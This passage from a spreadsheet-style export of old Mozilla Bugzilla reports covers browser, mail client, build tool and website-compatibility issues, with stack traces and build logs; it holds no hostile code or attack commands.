    <t>There are two places in the cycle collector where we use a nsDeque (mBuf) but where we don't really need to. We use mBuf to store purple nodes before adding them to the graph but we could just add them to the graph directly. We also use mBuf to store the PtrInfo's for white nodes while we root/unlink/unroot them using a nsTPtrArray should work just fine for that. This might help a bit for reducing memory fragmentation.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-291953</t>
  </si>
  <si>
    <t>RSS feeds: channel link tag misses http prefix</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.7) Gecko/20050414 Firefox/1.0.3
The RSS feeds beginning looks like
Mozilla Update::Newest 
addons.update.mozilla.org
The link value misses http://. This leads to a non working link (for the feed
name) in most RSS readers (tested with Sage).
Reproducible: Always
Steps to Reproduce:
1.Open https://addons.update.mozilla.org/rss/?application=firefox&amp;list=newest in
a RSS reader
2.Try navigating to the page linked in the feed.</t>
  </si>
  <si>
    <t>Michael.Keppler</t>
  </si>
  <si>
    <t>TOOLKIT-314992</t>
  </si>
  <si>
    <t>Update Status Install Pending should be localizable</t>
  </si>
  <si>
    <t>Software update status Install Pending is now hardcoded:
http://lxr.mozilla.org/mozilla1.8/source/toolkit/mozapps/update/src/nsUpdateService.js.in#2232
This should be splited into updates.properties and read with string bunlde like
other status:
http://lxr.mozilla.org/mozilla1.8/source/toolkit/locales/en-US/chrome/mozapps/update/updates.properties#65
http://lxr.mozilla.org/mozilla1.8/source/toolkit/mozapps/update/src/nsUpdateService.js.in#1021
  p.s.
This status will be shown under Update Installed in the Update History dialog.
Installed and Pending is discrepancy and should be changed.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-325433</t>
  </si>
  <si>
    <t>Networking: SMTP</t>
  </si>
  <si>
    <t>CITI's gssapi exit()s if not properly configured when the auth extension is called</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051128 SUSE/1.5-0.1 Firefox/1.5
Build Identifier: Thunderbird 1.5 (downloaded from www.mozilla.com 1 Feb 2006)
Whenever I click to send a composed mail Thunderbird crashes. The program terminates and no processes are left in memory. Using non-SSL SMTP server. I believe my SMTP server uses TLS but any setting I try (not secure TLS if available TLS and even SSL etc) causes the problem. So I can't send any mail! Tried a variety of addresses to send mail to. 
Reproducible: Always
Steps to Reproduce:
1.Compose new mail
2.Send mail!
3.
Actual Results:  
Thunderbird crashes and disappears. No processes in memory any longer. 
Expected Results:  
The mail should be sent and I should be returned to the mail window.
I'm running SUSE 10 and the version of Thunderbird downloaded directly from www.mozilla.com (copied to my home directory and run as ordinary user). The SMTP server I use (which I can't reveal for privacy reasons) appears to use a certificate. Receiving mail is done via IMAP. I'll be happy to attach log files but don't know where they're located. I literally downloaded it an hour ago set it up downloaded my mail and then encounterd this problem. No extensions no themes no add-ins.</t>
  </si>
  <si>
    <t>flapster001</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-461485</t>
  </si>
  <si>
    <t>Treehydra: JS Exception: no operands in RESULT_DECL node</t>
  </si>
  <si>
    <t>I don't know if zero_nonzero is to blame for this or if this is a case GCCNode.prototype.operands should handle.
The output below is after I tweaked the error case in GCCNode.prototype.operands to include this.toString() in the error message.
The jsinterp.js code on the stack at frame #4 is:
  RedGreenCheck.prototype.flowStateCond = function(isn truth state) {
    // forward event to mixin
    this._zeroNonzero.flowStateCond(isn truth state)
    ...
  }
/home/jorendorff/gcc-dehydra/installed/bin/g++ -o Fragmento.o -c -I../../dist/include/system_wrappers -include /home/jorendorff/dev/tracemonkey/config/gcc_hidden.h -DAVMPLUS_IA32 -DAVMPLUS_UNIX -DAVMPLUS_LINUX -DFEATURE_NANOJIT -DJS_TRACER -DOSTYPE=\Linux2.6\ -DOSARCH=Linux -DEXPORT_JS_API  -DJS_USE_SAFE_ARENA  -I/home/jorendorff/dev/tracemonkey/js/src -I.  -I../../dist/include   -I../../dist/include/js -I/home/jorendorff/dev/tracemonkey/obj-ff-static-check/dist/include/nspr     -I/home/jorendorff/dev/tracemonkey/obj-ff-static-check/dist/sdk/include -I/home/jorendorff/dev/tracemonkey/js/src    -fPIC   -fno-rtti -fno-exceptions -Wall -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -Wno-invalid-offsetof -Wno-long-long -pedantic -fno-strict-aliasing -fshort-wchar -pthread -pipe  -DDEBUG -D_DEBUG -DDEBUG_jorendorff -DTRACING -g -fno-inline -fplugin=/home/jorendorff/gcc-dehydra/dehydra-gcc/gcc_treehydra.so -fplugin-arg=/home/jorendorff/dev/tracemonkey/xpcom/analysis/static-checking.js --topsrcdir=/home/jorendorff/dev/tracemonkey --objdir=../.. --dehydra-modules=/home/jorendorff/dev/tracemonkey/xpcom/analysis/final.js --treehydra-modules=/home/jorendorff/dev/tracemonkey/xpcom/analysis/stack.js/home/jorendorff/dev/tracemonkey/xpcom/analysis/jsinterp.js    -DMOZILLA_CLIENT -include ../../mozilla-config.h -Wp-MD.deps/Fragmento.pp /home/jorendorff/dev/tracemonkey/js/src/nanojit/Fragmento.cpp
In file included from /home/jorendorff/dev/tracemonkey/js/src/nanojit/Fragmento.cpp:41:
/home/jorendorff/dev/tracemonkey/js/src/nanojit/nanojit.h:86:48: warning: anonymous variadic macros were introduced in C99
/home/jorendorff/dev/tracemonkey/js/src/nanojit/nanojit.h:92:47: warning: anonymous variadic macros were introduced in C99
/home/jorendorff/dev/tracemonkey/js/src/nanojit/nanojit.h:94:30: warning: anonymous variadic macros were introduced in C99
/home/jorendorff/dev/tracemonkey/js/src/nanojit/nanojit.h:120:23: warning: anonymous variadic macros were introduced in C99
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/treehydra.js:63: JS Exception: no operands in {tree_code:RESULT_DECL toCString:R_12079 operands[0] }
:0:	#0: Error(no operands in {tree_code:RESULT_DECL toCString:\R_12079\ operands[0] })
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/treehydra.js:63:	#1: ()
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/unstable/zero_nonzero.js:46:	#2: ([object GCCNode][object Object])
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/unstable/zero_nonzero.js:38:	#3: ([object GCCNode][object Object])
/home/jorendorff/dev/tracemonkey/xpcom/analysis/jsinterp.js:112:	#4: ([object GCCNode][object Object])
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/unstable/esp.js:550:	#5: ([object GCCNode])
/home/jorendorff/gcc-dehydra/dehydra-gcc/libs/unstable/esp.js:456:	#6: ()
/home/jorendorff/dev/tracemonkey/xpcom/analysis/jsinterp.js:65:	#7: process_tree([object GCCNode])
/home/jorendorff/dev/tracemonkey/xpcom/analysis/static-checking.js:72:	#8: process_tree([object GCCNode])
make[1]: *** [Fragmento.o] Error 1
make[1]: Leaving directory `/home/jorendorff/dev/tracemonkey/obj-ff-static-check/js/src'
make: *** [default] Error 2</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-250176</t>
  </si>
  <si>
    <t>Error ``r has no properties'' [xs] in file ``http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp&amp;rev=1.76.14.1'' line 15 character 0.</t>
  </si>
  <si>
    <t>function showMessage(rev line) needs to verify that the element it gets is
available. It may not be if you hover over something while the page is loading.</t>
  </si>
  <si>
    <t>THUNDERBIRD-466784</t>
  </si>
  <si>
    <t>Port bug 462762 windows changes to the unix integration for new mail alerts.</t>
  </si>
  <si>
    <t>Created attachment 350132
screenshot
re-produce steps
1. open a terminal
2. thunderbird -P 
   create a new profile
3. setup a Gmail IMAP account 
4. login 
expected result:
new mail alert window will popup and new mail info is shown in that window.
actual result
see the attached screenshot.</t>
  </si>
  <si>
    <t>CORE-417999</t>
  </si>
  <si>
    <t>JS_ArenaFreeAllocation considered excessive (harmful if not dangerous)</t>
  </si>
  <si>
    <t>Created attachment 303784
slash and burn
This API foils the patch from bug 408921 comment #18 (with -DJS_ARENA_GROSS_SIZE_THRESHOLD=xxx).  It's not entirely clear how or why but discussion with Brendan seems to indicate that non-LIFO behavior in arenas is fundamentally unsound.
The bug 408921 comment #18 causes multiple test failures one of which is in tests/ecma_3/Statements/regress-324650.js crashing on the lone JS_ArenaFreeAllocation call in js/src which is in SpanDep code (bug 417995 has a patch to remove that usage this patch depends upon that).</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-438409</t>
  </si>
  <si>
    <t>Install test Zimbra server</t>
  </si>
  <si>
    <t>It looks from http://bugzilla.zimbra.com/show_bug.cgi?id=10364 as Zimbra supports condstore and we want zimbra for testing caldav anyway and I have a license from them anyway so adding this to gozer's queue.
Gozer I'll send you the license info in a separate email</t>
  </si>
  <si>
    <t>FIREFOX-330130</t>
  </si>
  <si>
    <t>Teach Open in Tabs to count to two</t>
  </si>
  <si>
    <t>Pre-Places the Open in Tabs menu item only appeared in bookmark folders with two or more items. You could maybe make a twisted case for tab discoverability for having it in a folder with one item but not for having it present and not disabled in an empty folder.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-172572</t>
  </si>
  <si>
    <t>macmall.com - Mouse over menus positioned incorrectly</t>
  </si>
  <si>
    <t>Mozilla 1.2b Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.2b)
Gecko/20021003
Caveat: I am not a developer so pardon me if my report is incomplete or
otherwise lacking. This did not seem to me to be a reported bug but ...
The mouse-over menus for the above WEB site pop up flush to the left side of the
browser window when the pointer is placed over them. This makes them
inaccessible for the later links. The mouse over menus are on a blue table with
categories such as software hardware audiovisual etc.</t>
  </si>
  <si>
    <t>SCosta</t>
  </si>
  <si>
    <t>CORE-445552</t>
  </si>
  <si>
    <t>Optimize Matrix Multiplication and General xform path For Color Management</t>
  </si>
  <si>
    <t>After implementing the precache strategy for LUT interpolation (see bug 444661) I discovered that there's also about a 10% performance hit coming from MAT3evalW. We'd like to get this number down significantly hopefully with some sort of SIMD/SSE2 optimization.</t>
  </si>
  <si>
    <t>CORE-309672</t>
  </si>
  <si>
    <t>Improve error handling when encountering invalid hostnames</t>
  </si>
  <si>
    <t>Improve error handling when encountering invalid hostnames.
With the patch for bug 304904 hostnames containing invalid characters (such as
'%' '/' and '\\') are treated as unresolvable (NS_ERROR_UNKNOWN_HOST).  It
would be better to report these hostnames as invalid instead of unknown.  This
would allow us to do the following:
 1)  bypass URL fixup code (e.g. it makes no sense to try loading 
     www.www%2emozilla.org if www%2emozilla.org was rejected)
 2)  notify the user that invalid characters may be a sign of phishy activity</t>
  </si>
  <si>
    <t>CORE-386599</t>
  </si>
  <si>
    <t>Recursive  with border hangs Firefox</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 270594
TESTCASE: Recursive embedding
I was playing around with Gran Paradiso 3.0a6rc2 and discovered a something
about how Firefox deals with embedding that related to this bug:
You can typically only have 2 levels of embedding (ie. an iframe in an iframe).
 This seems to be the case with   and .  However if
you have an  that points to the original document and has a 1px border
Firefox will get caught in a recursive loop and bloat until the user decides to
force quit or the system can no longer take the load.
Here is the offending tag that causes the recursion assuming the containing
document is called index.html:
The results I experienced on my system were that firefox took 50% of my cpu
usage (100% of 1 core) and bloated to 350MB after about 30 minutes of watching
task manager before I got bored and forced quit.  Firefox probably would have
been more than happy to munch away at more of my ram had I not stopped it.
Note:  This only affects Firefox 3.0-based builds as far as I can tell. 
Firefox 2.0.0.4 only allows for a single level of recursion (ie. one layer of
embedding within the parent layer of embedding).  I saw this on both GP 3.0a6
rc2 and the latest nightly trunk from June 29 2007.
I have attached a test case that simulates what I saw.  The test case cannot be run through bugzilla.  It must be saved and run locally.  Alternatively you can copy the following code into an empty file called testcase.html and run it that way.
Test Case code:
</t>
  </si>
  <si>
    <t>CORE-445707</t>
  </si>
  <si>
    <t>BadValue in XShmPutImage with windowless Flash</t>
  </si>
  <si>
    <t>STR:
* Install flash player 10 beta 2 (d525)
* View
  http://26dayswithoutaniphone.com/index.php/2008/07/14/more-pictures-from-the-weekend/
  on a local X display.
* Scroll down so that the large video is visible
* Cover the bottom right-corner of the video with the top-left corner of
  another window.
* Drag the covering window down
Results:
BadValue (integer parameter out of range for operation)
It seems that XShmPutImage produces the BadValue error when the subimage does
not fit within the destination drawable.  (XPutImage handles such cases
without error and transfers the appropriate portion of the image as expected.)
#0  _XError (dpy=0x8062628 rep=0xbf91e520) at ../../src/XlibInt.c:2874
#1  0xb73246c4 in _XReply (dpy=0x8062628 rep=0xbf91e520 extra=0 discard=1)
    at ../../src/XlibInt.c:1833
#2  0xb731e5da in XSync (dpy=0x8062628 discard=0) at ../../src/Sync.c:48
#3  0xb731e755 in _XSyncFunction (dpy=0x8062628) at ../../src/Synchro.c:37
#4  0xb74c162b in XShmPutImage (dpy=0x8062628 d=48240934 gc=0x94c9ec8
    image=0x928c540 src_x=403 src_y=262 dst_x=-1 dst_y=0 src_width=198
    src_height=1 send_event=0) at ../../src/XShm.c:358
#5  0xb755664a in gdk_x11_draw_image (drawable=0x8c2cd80 gc=0x9104408
    image=0x9104360 xsrc=403 ysrc=262 xdest=-1 ydest=0 width=198
    height=1) at /build/buildd/gtk+2.0-2.12.0/gdk/x11/gdkdrawable-x11.c:795
#6  0xb752e2a2 in IA__gdk_draw_image (drawable=0x8c2cd80 gc=0x9104408
    image=0x9104360 xsrc=403 ysrc=262 xdest=-1 ydest=0 width=198
    height=1) at /build/buildd/gtk+2.0-2.12.0/gdk/gdkdraw.c:703
#7  0xb75398bc in gdk_pixmap_draw_image (drawable=0x86126a8 gc=0x9104408
    image=0x9104360 xsrc=403 ysrc=262 xdest=-1 ydest=0 width=198
    height=1) at /build/buildd/gtk+2.0-2.12.0/gdk/gdkpixmap.c:407
#8  0xb752e2a2 in IA__gdk_draw_image (drawable=0x86126a8 gc=0x9104408
    image=0x9104360 xsrc=403 ysrc=262 xdest=-1 ydest=0 width=198
    height=1) at /build/buildd/gtk+2.0-2.12.0/gdk/gdkdraw.c:703
#9  0xac788bb0 in ?? () from /home/karl/flash/d525/libflashplayer.so
#10 0xac77cd8a in ?? () from /home/karl/flash/d525/libflashplayer.so
#11 0xac773d80 in ?? () from /home/karl/flash/d525/libflashplayer.so
#12 0xac7788b4 in Private_HandleEvent ()
   from /home/karl/flash/d525/libflashplayer.so
#13 0xad1e56e0 in ns4xPluginInstance::HandleEvent (this=0x94d4128
    event=0xbf91e86c handled=0xbf91e85c)
    at /home/karl/moz/dev/modules/plugin/base/src/ns4xPluginInstance.cpp:1310
#14 0xad71f95b in nsPluginInstanceOwner::Renderer::NativeDraw (
    this=0xbf91ed1c screen=0x8060ab8 drawable=48240934 visual=0x8067780
    colormap=32 offsetX=-403 offsetY=-262 clipRects=0xbf91e968
    numClipRects=1) at /home/karl/moz/dev/layout/generic/nsObjectFrame.cpp:4214
Plugins do not get told the dimensions of the drawable but they do get told
the dirty rect on the drawable so it would seem reasonable for plugins to
assume that drawing to the dirty rect would be safe.  However the dirty rect
provided to the plugin in the expose event is not on the drawable:
(gdb) f 14
#14 0xad71f95b in nsPluginInstanceOwner::Renderer::NativeDraw (
    this=0xbf91ed1c screen=0x8060ab8 drawable=48240934 visual=0x8067780
    colormap=32 offsetX=-403 offsetY=-262 clipRects=0xbf91e968
    numClipRects=1) at /home/karl/moz/dev/layout/generic/nsObjectFrame.cpp:4214
4214      mInstance-&gt;HandleEvent(
(gdb) p exposeEvent
$1 = (._182 &amp;) @0xbf91e86c: {type = 13 serial = 0 send_event = 0
  display = 0x8062628 drawable = 48240934 x = -1 y = 0 width = 198
  height = 1 count = 0 major_code = 0 minor_code = 0}
(gdb) f 8
#8  0xb752e2a2 in IA__gdk_draw_image (drawable=0x86126a8 gc=0x9104408
    image=0x9104360 xsrc=403 ysrc=262 xdest=-1 ydest=0 width=198
    height=1) at /build/buildd/gtk+2.0-2.12.0/gdk/gdkdraw.c:703
703     /build/buildd/gtk+2.0-2.12.0/gdk/gdkdraw.c: No such file or directory.
        in /build/buildd/gtk+2.0-2.12.0/gdk/gdkdraw.c
(gdb) p gdk_x11_drawable_get_xid(drawable)
$3 = 48240934
(gdb) f 16
#16 0xb2218543 in _draw_with_xlib_direct (cr=0x91fd578
    default_display=0x8062628 callback=0xb2237dc0 
    closure=0xbf91ec58 bounds_width=600 bounds_height=600 capabilities=27)
    at /home/karl/moz/dev/gfx/thebes/src/cairo-xlib-utils.c:312
312         callback (closure screen d visual offset_x offset_y rectangles
(gdb) p ((cairo_xlib_surface_t*)target)-&gt;width
$5 = 197
(gdb) p ((cairo_xlib_surface_t*)target)-&gt;height
$6 = 1
The dirty rect given to the plugin comes from rounding the app-unit dirty rect
out to pixels.  The reason why the app unit dirty rect is not pixel aligned is
because nsDisplayClip::Paint for the nsSubDocumentFrame intersects the
unsnapped clip rect with the dirty rect.
I don't yet know why the dirty rect is larger than the surface when there is
no rotation involved.
Perhaps a similar situation may have been possible before the fix for bug
430450 but the rounding out of the dirty rect in that fix makes this
situation much more likely.</t>
  </si>
  <si>
    <t>CORE-234703</t>
  </si>
  <si>
    <t>mClassInfoFlags is always 0 instead of using the XPCWrappedNativeProto(... ClassInfoFlags ...) value</t>
  </si>
  <si>
    <t>While working on bug 81879 i tripped over the fact that mClassInfoFlags is
always 0.
Testcase (for debug xpcshell):
var gES =
Components.classes[@mozilla.org/exceptionservice1].getService(Components.interfaces.nsIExceptionService)
print(gES.currentExceptionManager)
function MyThreadType() {}
MyThreadType.prototype = {Run: function() {var es =
Components.classes[@mozilla.org/exceptionservice1].getService(Components.interfaces.nsIExceptionService)
print(es.currentExceptionManager) }}
const tconstructor=new Components.Constructor(@mozilla.org/thread1 nsIThread)
var mythread myrunnable
mythread = new tconstructor() myrunnable = new MyThreadType()
mythread.init(myrunnable 8000 1 1 1)
The code was introduced in 1.1.10.2 of xpcwrappednativeproto.cpp
Fixing this unfortunately requires significant testing as it means we'll be
exercising code which should have been exercised for years but hasn't.</t>
  </si>
  <si>
    <t>TESTOPIA-367545</t>
  </si>
  <si>
    <t>ui needs to support more batch operations i.e. delete multiple cases update component on multiple cases etc.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
Build Identifier: 1.1
When I have a list of test cases that I'm working on there is no batch way to delete selected test cases.  I have to go through one by one.  Also there is no way to update multiple test case component fields.  At least these two operations should be permitted to be executed against a batch of test cases.  Other fields may be possible.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>tompr</t>
  </si>
  <si>
    <t>CORE-493160</t>
  </si>
  <si>
    <t>Modify nsWaveDecoder to use mozilla::Mutex/CondVar</t>
  </si>
  <si>
    <t>PRMonitor is dying out so code using it should be upgraded to the new mozilla:: synchronization.  It's probably worthwhile to also substitute a mutex+condvar for the monitor.  There are two main reasons:
 (1) Current code uses nsAutoMonitor.Exit/Enter extensively and these functions have been deprecated.  They're not available on mozilla::MonitorAutoEnter.
 (2) Mutex is non-recursive whereas Monitor is recursive.  This means that when Monitor.Exit() is called there's no guarantee you've actually unlocked it.  For this code that's just asking for a nasty performance bug (or deadlock) and non-recursive acquisition therefore must be an implicit invariant.  Mutex makes this an *explicit* invariant.
I don't mind doing the rewrite as it should hopefully be relatively easy.
Rob requested this be delayed until after 3.5 ships.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-510992</t>
  </si>
  <si>
    <t>MozillaTry waterfall unusably wide due to talos column bloat</t>
  </si>
  <si>
    <t>Each talos box gets it's own column on MozillaTry for each type of test suite it runs - leading to 90 or so columns.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-55293</t>
  </si>
  <si>
    <t>Pages in history don't expire after x days while mozilla is running</t>
  </si>
  <si>
    <t>Build Mozilla/5.0 (Windows U WinNT4.0 en-US m18) Gecko/20001004.
I have set the delay for pages to expire in history to 9 days.
But it seems that nothing is done : I still have pages from 18/09 in history
(last time I manually deleted the history file)</t>
  </si>
  <si>
    <t>mozbug</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-299807</t>
  </si>
  <si>
    <t>little yellow triangle for Error Page favicon no longer shown</t>
  </si>
  <si>
    <t>Some time ago Simon fixed things so that when a site failed to load/error page
was displayed we got a little yellow /!\ triangle as the favicon.
This no longer works I'm not sure when it regressed :-(</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-353147</t>
  </si>
  <si>
    <t>zh-TW / Chinese (Traditional)</t>
  </si>
  <si>
    <t>Remove un-approved link in bookmarks.html</t>
  </si>
  <si>
    <t>Revision 1.2.2.19 added a link to bookmarks.html in zh-TW which must not have landed.
Please remove that link again community site exposure will happen as part of the mozilla.com l10n website.</t>
  </si>
  <si>
    <t>josesun</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-102038</t>
  </si>
  <si>
    <t>wachovia.com - javascript:signOff() function doesn't work</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.4) Gecko/20010913
BuildID:    2001091311
This is going to be a tuff one since it is in a secure site - wachovia online
banking site.  There is a Logout pic at the top left corner (in a frame) that
executes 'javascript:signOff()' when clicked.  Problem is that it doesn't log
you off the system when it is pressed.  I haven't tried it in other version of
mozilla or on mozilla on other platforms but it works under windows (IE and
Netscape4.x) as well as Netscape 4.x on any platform (Unix'es etc).
Reproducible: Always
Steps to Reproduce:
1. Go to https://myaccounts.wachovia.com/homepage.html (if you could logon)
2. Click the logout button (nothing happens).
3.
Actual Results:  Nothing (that's the problem).
Expected Results:  Should logoff the banking site.
Let me know if I can send you code snippets or anything I can do to you help fix
this problem.
DOes mozilla not mimic netscape 4?  Below is the signOff function.
function signOff() {
   if(top.isNS4){
    document.captureEvents(Event.CLICK)
	document.onclick=DoNothing
	}
	else {
	document.all.signOffAnchor.href=
	}
	document.SignOff.action = top.myURL + ?ExecHTML
    document.SignOff.SessionKey.value = top.myKey
    document.SignOff.FI.value = top.fiName
    document.SignOff.submit()
}</t>
  </si>
  <si>
    <t>rgoldiez</t>
  </si>
  <si>
    <t>FIREFOX-432578</t>
  </si>
  <si>
    <t>history expiration should remove orphaned bookmarks</t>
  </si>
  <si>
    <t>orphaned bookmarks should not be able to be created via the api anymore now that bug 428133 is fixed. however any left over from before that fix should be removed from the database.
we could add a check to the expiration code that always clears danglers but that might be overkill. maybe only a one-time purge is needed.</t>
  </si>
  <si>
    <t>NSS-334443</t>
  </si>
  <si>
    <t>oom Crash in nssCKFWSession_Create</t>
  </si>
  <si>
    <t>found by coverity</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-529066</t>
  </si>
  <si>
    <t>unable to unlock a locked out account after password failures</t>
  </si>
  <si>
    <t>Received an email on bugzilla-admin from a user who was getting errors trying to click the link on an account unlock notification mail.
URL: https://bugzilla.mozilla.org/token.cgi?t=xxomittedxx&amp;a=unlock_account
   Unknown action unlock_account!</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-296702</t>
  </si>
  <si>
    <t>Add text serializer to ChatZilla</t>
  </si>
  <si>
    <t>As part of the work for doing the stored away messages I wrote a text
serialiser thingy which can turn a sequence of JS objects into a plain text
file and also recontrust the JS objects from the file later.
I think we should put this in now separately so certain other features can be
developed on it while CVS catches up to the current releases.</t>
  </si>
  <si>
    <t>TOOLKIT-474334</t>
  </si>
  <si>
    <t>place: is a valid query to deserialize and should not cause an ignoring unknown key: warning</t>
  </si>
  <si>
    <t>Created attachment 357712
patch v1.0
Seen while looking at bug 370197.
When we have a query where we only defined default values (for example expandQueries = 1 and queryType=QUERY_TYPE_HISTORY) and we serialize it we end up with a query like place:.
When we deserialize this query we get a WARNING since we are trying to handle place: as a query option... instead we should simply return an array with a new default query in it since that's a valid case.
i'll add a test for this.</t>
  </si>
  <si>
    <t>TOOLKIT-413961</t>
  </si>
  <si>
    <t>chrome://global/skin/arrow/* icons don't show up in high contrast mode</t>
  </si>
  <si>
    <t>spin-off from bug 352477 where arrow-dn.gif has been fixed:
(bug 352477 comment 0)
&gt; chrome://global/skin/arrow/arrow-dn.gif does not show up in high conrtrast mode
&gt; 
&gt; I'm running into this with the alltabs button and from a search in bugzilla
&gt; it's also being reported in a number of other places.
(bug 352477 comment 9)
&gt; We have a lot of arrows do we need to update all of them?
&gt; 
&gt; http://mxr.mozilla.org/seamonkey/source/toolkit/themes/winstripe/global/arrow/</t>
  </si>
  <si>
    <t>CORE-84909</t>
  </si>
  <si>
    <t>HTML form inside a table moves when entering text</t>
  </si>
  <si>
    <t>As in the summary this page should display some content but in Mozilla i can
see only background. I don't understand its code so I don't know whether it is
an evangelism case...</t>
  </si>
  <si>
    <t>aleksander.adamowski</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-130466</t>
  </si>
  <si>
    <t>arkndesign.com - misidentifies gecko as netscape 4.x refuses entry (though site works)</t>
  </si>
  <si>
    <t>This is frustrating. It's a (web+) design company's site which incorrectly
identifies mozilla as netscape and refuses entry even though the site works
fine with mozilla (if you painstakingly load each internal page manually).
Most of the site is flash anyway.
Here's the exact message:
[image of a police man holding up a stop hand to the Netscape logo]
NO NETSCAPE !!!
it's not a suitable way to view our site with netscape
in this moment coz it contains numerous bugs.
let's use internet explorer 5 first
apologise for netscape users.</t>
  </si>
  <si>
    <t>CORE-95518</t>
  </si>
  <si>
    <t>reduce memory usage of fontinfo map in Linux GFX</t>
  </si>
  <si>
    <t>Currently GFX on Linux use a PRUint32 info[2048] to represent it can render 
unciode or not. 
bstell mention that he have a algorithm which cna reduce the needed memroy.</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT-900585</t>
  </si>
  <si>
    <t>Bugherder</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT</t>
  </si>
  <si>
    <t>Add support for b2g-inbound to mcMerge</t>
  </si>
  <si>
    <t>Right now mcMerge doesn't know what b2g-inbound is.</t>
  </si>
  <si>
    <t>SEAMONKEY-255253</t>
  </si>
  <si>
    <t>Can't delete using the menu</t>
  </si>
  <si>
    <t>In 2001 most command updaters were changed from broadcasters to commands
although for some reason addressbook.xul's cmd_delete did not get updated.
Recently a possible infinite loop dispatching command events was discovered so
to prevent this command events may now only be retargetted to command nodes.
This of course excludes addressbook's broadcaster.
Note that key events use a different retargetting mechanism which is unaffected.</t>
  </si>
  <si>
    <t>CORE-126466</t>
  </si>
  <si>
    <t>Endless webshells created until out of memory hang or crash</t>
  </si>
  <si>
    <t>Build: 02-18 trunk build
By loading the page: http://www.ccidnet.com - this is a very popular Simplified
Chinese web site when load the page there will be a pop-up window the machine
CPU will up to 100% and then browser will hang. (See some comments in bug 126264).
IE doesn't has same problem.</t>
  </si>
  <si>
    <t>MARKETING-387062</t>
  </si>
  <si>
    <t>Website pretending to be Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: 
The folks at thefirefox.net are misusing the Firefox trademark.  As you can see at the link I submitted to you they have stolen the main Mozilla graphics in order to confuse the customer.  If you go to the main index of the web site they are almost doing the same - just to lead folks into the Get Firefox with the Google Toolbar clickthrough ad.  Here are this guy's other Firefox Web sites (clones of this one):
thefirefox.net
bestfirefox.info
firefoxsite.info
Reproducible: Always</t>
  </si>
  <si>
    <t>cheasym</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-162223</t>
  </si>
  <si>
    <t>Webec does not work with Mozilla</t>
  </si>
  <si>
    <t>Hi All
  Please post this to Tech Evangelism.
  Webec will not function with Mozilla.  As users are required to 
have accounts and passwords the TE group will have to request 
a guest account to test with.
   Webec can be reached at http://webec.com
           SPS Commerce Inc.
           1450 Energy Park Drive Suite 127 
           St. Paul MN 55108 USA 
           (651) 603-4400
           portal@spscommerce.com
Many thanks
--Tony</t>
  </si>
  <si>
    <t>CORE-81640</t>
  </si>
  <si>
    <t>Lower threshold for large cache entry eviction</t>
  </si>
  <si>
    <t>Mozilla should have a user configurable limit on the maximum size of an
object that can be permanently cached. Retrieving a really large object
forces other objects out of the cache which may not be reasonable
particularly for users on a slow link. For example I often visit sites
which have the same image in various sizes. There is a small browse
version and a hi-res version. You view the browse version and download
the hi-res version if it's interesting. The hi-res version is often a
4MB jpeg or even a 40MB tiff and it is _not_ meant for viewing in a
browser. It is irritating to see mozilla flush almost everything else in 
its cache just to accommodate these beasts.
For symmetry there probably should also be a minimum size limit. I can 
imagine a user on a fast network retrieving small objects from a proxy 
server or something without storing them in mozilla's disk cache.
If it were me I would set a maximum size of 4MB and a minimum size of 0.
Just some ideas.</t>
  </si>
  <si>
    <t>byronm</t>
  </si>
  <si>
    <t>MOZILLA.ORG-415100</t>
  </si>
  <si>
    <t>vista x64 msys compat</t>
  </si>
  <si>
    <t>The URL says that a newer release of MSYS has fixed some Vista x64 compat issues and his workaround is to download the msys dll and replace the one in MozillaBuild.  We should just update our copy for the next release.</t>
  </si>
  <si>
    <t>CORE-206561</t>
  </si>
  <si>
    <t>Memory leak on www.bhun.net</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4b) Gecko/20030507
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4b) Gecko/20030507
I tested the page with both Mozilla 1.3 and Mozilla 1.4b. 
When reloading the document in Mozilla 1.4b the amount of free memory keeps
